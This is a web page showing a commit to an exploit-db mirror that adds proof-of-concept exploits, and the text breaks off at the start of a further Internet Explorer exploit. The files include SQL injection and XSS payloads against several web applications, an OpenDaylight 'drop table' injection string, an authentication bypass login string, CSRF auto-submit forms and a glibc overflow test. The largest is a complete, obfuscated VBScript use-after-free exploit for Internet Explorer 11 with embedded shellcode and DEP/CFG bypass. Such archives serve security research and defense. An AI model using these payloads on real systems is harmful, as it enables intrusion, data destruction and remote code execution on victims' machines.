bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-25

Browse source 
16 changes to exploits/shellcodes

DynoRoot DHCP - Client Command Injection
DynoRoot DHCP Client - Command Injection
Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution
Flash ActiveX 18.0.0.194 - Code Execution
Microsoft Internet Explorer 11 - javascript Code Execution
Flash ActiveX 28.0.0.137 - Code Execution (1)
Flash ActiveX 28.0.0.137 - Code Execution (2)
GNU glibc < 2.27 - Local Buffer Overflow

NewsBee CMS 1.4 - Cross-Site Request Forgery
ASP.NET jVideo Kit - 'query' SQL Injection
PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting
OpenDaylight - SQL Injection
Timber 1.1 - Cross-Site Request Forgery
Honeywell XL Web Controller - Cross-Site Scripting
EU MRV Regulatory Complete Solution 1 - Authentication Bypass

Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)
Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)
This commit is contained in:
Offensive Security 2018-05-25 05:01:45 +00:00
parent 54b5ed8407
commit c0126aa27f
17 changed files with 1309 additions and 123 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
exploits/asp/webapps/44739.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaSoft Pro
# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/
# Version: v1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'query' parameter. You can use the GET or POST
methods.
====================================================
# PoC : SQLi :
# GET : http://test.com/search?query=[SQL]
# POST : http://test.com/search
POST /search HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.com/login
Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o;
__RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Query=test
# Vulnerable Payload :
Parameter: query (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: query=test%' AND 3923=3923 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause (IN)
Payload: query=test%' AND 1603 IN (SELECT
(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN
(1603=1603) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='
====================================================

22
exploits/java/webapps/44747.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: OpenDaylight SQL Injection
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.opendaylight.org
# CVE: CVE-2018-1132
intro:
OpenDaylight (ODL) is a modular open platform for customizing and automating networks of any size and scale. The OpenDaylight Project arose out of the SDN movement, with a clear focus on network programmability. It was designed from the outset as a foundation for commercial solutions that address a variety of use cases in existing network environments.
attackers can SQL inject the component's database(SQLite) without authenticating to the controller or SDNInterfaceapp.
The bug is in /impl/src/main/java/org/opendaylight/sdninterfaceapp/impl/database/SdniDataBase.java (line 373~391)
The SDNI concats port information to build an insert SQL query, and it executes the query in SQLite.
However, in line 386, the portName is a string that can be customized by switches. Since SQLite supports multiple sql queries in one run,
attackers can customize the port name to inject another SQL if they compromise or forge a switch.
POC:
For example, he can set portName as:
");drop table NAME;//

36
exploits/linux/local/44750.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237
# POC:
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>
#define N 97699
char a[N];
char b[N+128];
int
main (void)
{
memset (a, 'x', N);
char *c = mempcpy (b, a, N);
assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
vmovups %zmm4, (%rax)
vmovups %zmm5, 0x40(%rax)
For mempcpy, %rax points to the end of the buffer.

57
exploits/linux/webapps/44749.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: Honeywell XL Web Controller - Cross-Site Scripting
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
# 104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
# XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
# XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE: CVE-2014-3110
# PoC
POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://79.2.122.25/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/
onload=prompt(/XSS/)>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest
HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT
<br />
<b>Warning</b>: xw_get_users() expects parameter 1 to be long, string
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>97</b><br />
<br />
<b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long,
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on
line <b>247</b><br />
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="expires" content="0"/>
<link rel="stylesheet" href="include/honeywell.css"/>
<title><br />
<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>300</b><br />
</title>

12
exploits/linux/webapps/44751.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: EU MRV Regulatory Complete Solution 1 - Authentication Bypass
# Date: 2018-05-24
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/eu-mrv-regulatory-complete-solution/21680923?s_rank=11
# Version: v1 (REQUIRED)
# Tested on: Windows
http://Target/projects/eumrv/app/#/access/signin
username: '=''or'
Password: '=''or'

121
exploits/php/webapps/44735.txt
View file

@ -1,121 +0,0 @@
# Title: NewsBee CMS 1.4 - Cross-Site Request Forgery
# Author: indoushka
# Tested on: windows 10 Français V.(Pro)
# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Dork: N/A
# PoC
<div class="full-height-scroll">
<div class="table-responsive" style="float:left;">
<div>
<form action="http://Target/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">
<label>Username</label>
<input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">
<label>Password</label>
<input name="pw" required="" class="form-control" id="pw" value="" type="password">
<label>Permissions</label>
<table class="table table-striped table-bordered table-hover " width="300">
<tbody><tr>
<td bgcolor="#CCCCCC">&nbsp;</td>
<td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
</tr>
<tr>
<td bgcolor="#CCCCCC">News</td>
<td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Videos</strong></td>
<td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
<td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Ads</strong></td>
<td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
<td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
<td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Categories</strong></td>
<td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Pages</strong></td>
<td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
</tbody></table>
<input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">
<input name="MM_insert" value="form1" type="hidden">
<input name="MM_update" value="form1" type="hidden">
</form>
<br>
</div>
</div>
</div>
</div>

44
exploits/php/webapps/44746.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaSoft Pro
# Vendor Homepage: https://codecanyon.net/item/paulnews-newspaper-and-magazine-script/19260686
# Version: v1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'keyword' parameter. You can use the GET or
POST methods.
====================================================
# PoC : SQLi :
http://test.com/news/search?keyword=[SQL]
# Vulnerable Payload :
Parameter: query (GET)
Type : boolean-based blind
Demo : http://test.com/news/search?keyword=test
Payload: keyword=-3431') OR 6871=6871#
Type : error-based
Demo : http://test.com/news/search?keyword=test
Payload: keyword=test') OR (SELECT 8996 FROM(SELECT
COUNT(*),CONCAT(0x71626b6271,(SELECT
(ELT(8996=8996,1))),0x71766b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsdG
Type : AND/OR time-based blind
Demo : http://test.com/news/search?keyword=test
Payload: keyword=test') OR SLEEP(5)-- OEdN
====================================================
# PoC : XSS :
Payload :
http://test.com/news/search?keyword=%27%20%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E%E2%80%98
;

42
exploits/php/webapps/44748.html Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Timber - Ultimate Freelancer Platform 1.1 - Cross site request forgery
# Date: 2018-05-24
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717
# Version: 1.1
# Tested on: Kali linux
=========================================
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://test.com/timber/request/backend/ajax/profile/update_user_profile" method="POST">
<input type="hidden" name="user&#95;nonce" value="e748717abd" />
<input type="hidden" name="profile&#95;avatar" value="" />
<input type="hidden" name="first&#95;name" value="decode" />
<input type="hidden" name="last&#95;name" value="lord" />
<input type="hidden" name="user&#95;name" value="test" />
<input type="hidden" name="job" value="Marketing&#32;Specialist" />
<input type="hidden" name="company" value="Envato" />
<input type="hidden" name="email" value="lord&#64;decode&#46;com" />
<input type="hidden" name="website" value="http&#58;&#47;&#47;envato&#46;com" />
<input type="hidden" name="language" value="en&#95;US" />
<input type="hidden" name="phone&#95;num" value="&#43;33&#32;&#40;0&#41;1&#32;42&#32;68&#32;53&#32;00" />
<input type="hidden" name="country" value="FR" />
<input type="hidden" name="city" value="Paris" />
<input type="hidden" name="address1" value="8&#32;Rue&#32;de&#32;Londres" />
<input type="hidden" name="address2" value="75009&#32;test" />
<input type="hidden" name="zip&#95;code" value="" />
<input type="hidden" name="vat&#95;nubmer" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
==========================================

353
exploits/windows/local/44741.html Normal file
View file

@ -0,0 +1,353 @@
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
lIlII=0
IllllI=0
IIlIIl=0
Id=CLng(Rnd*1000000)
lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lIlII=lIlII-(&h86d+6447-&H219b)
End If
IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function
Function lIIII(ByVal lIlIl)
IIll=""
For index=0 To Len(lIlIl)-1
IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Next
IIll=IIll &"00"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &"00"
End If
For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
lIIII=lIIII &"%u" &lIlIll &lIIIlI
Next
End Function
Function lIlI(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
lIlI=IIII
End Function
Function GetUint32(lIII)
Dim value
llll.mem(IlII+8)=lIII+4
llll.mem(IlII)=8 'type string
value=llll.P0123456789
llll.mem(IlII)=2
GetUint32=value
End Function
Function IllIIl(lIII)
IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
llll.mem(IlII)=(&h713+3616-&H1530)
GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
On Error Resume Next
Dim lllll
lllll=llllll
lllll=null
SetMemValue lllll
LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
Dim llIl
llIl=IllIll And &hffff0000
Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
llIl=llIl-65536
Loop
GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
Dim lIIlI,IIIl
lIIlI=""
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
Next
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim IIIIII
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim Illlll
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
Illlll=IllIIl(function_ordin+index*2)
p=GetUint32(function_rvas+Illlll*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &lIIII(IIIII("")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=lIlI((value And &hffff0000)/&h10000,4)
Low=lIlI(value And &hffff,4)
EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
IlllI=lIlI(NtContinueAddr,8)
IlIII=Mid(IlllI,1,2)
llllI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lIllI=Mid(IlllI,7,2)
IIlI=""
IIlI=IIlI &"%u0000%u" &lIllI &"00"
For IIIl=1 To 3
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u" &lIllI &IlIII
Next
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u00" &IlIII
lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
Dim IIlI
IIlI=String((100334-65536),Unescape("%u4141"))
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(&h3000)
IIlI=IIlI &EscapeAddress(&h40)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
IIlI=IIlI &String(6,Unescape("%u4242"))
IIlI=IIlI &lIllIl()
IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
Dim IIlI
Dim lllllI
lllllI=lIlll+&h23
IIlI=""
IIlI=IIlI &EscapeAddress(lllllI)
IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
IIlI=IIlI &EscapeAddress(&h1b)
IIlI=IIlI &EscapeAddress(0)
IIlI=IIlI &EscapeAddress(lIlll)
IIlI=IIlI &EscapeAddress(&h23)
IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
llll.mem(IlII)=&h4d 'DEP bypass
llll.mem(IlII+8)=0
msgbox(IlII) 'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
IllI=IllI+(&h14b5+2725-&H1f59)
lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
IllI=IllI+(&h880+542-&Ha9d)
lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set IIllI(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set IIllI(IIIl)=New llIIl
Next
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla1
Erase lIIl
Next
Set llll=New llIIl
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla2
Erase lIIl
Next
Set IIIIl=New llIIl
End Sub
Sub InitObjects
llll.SetProp(llllIl)
IIIIl.SetProp(IlIIII)
IlII=IIIIl.mem
End Sub
Sub StartExploit
UAF
InitObjects
vb_adrr=LeakVBAddr()
Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
Alert "VBScript Base: 0x" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
Alert "MSVCRT Base: 0x" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
Alert "KernelBase Base: 0x" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
Alert "Ntdll Base: 0x" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
lIlll=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
Alert "Executing Shellcode"
ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>

5
exploits/windows/local/44742.txt Normal file
View file

@ -0,0 +1,5 @@
## CVE-2015-5112
Pop up a calculator - Requires Flash ActiveX 18.0.0.194
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44742.swf

267
exploits/windows/local/44743.html Normal file
View file

@ -0,0 +1,267 @@
<html>
<body>
<script>
ARR_SIZE = 3248;
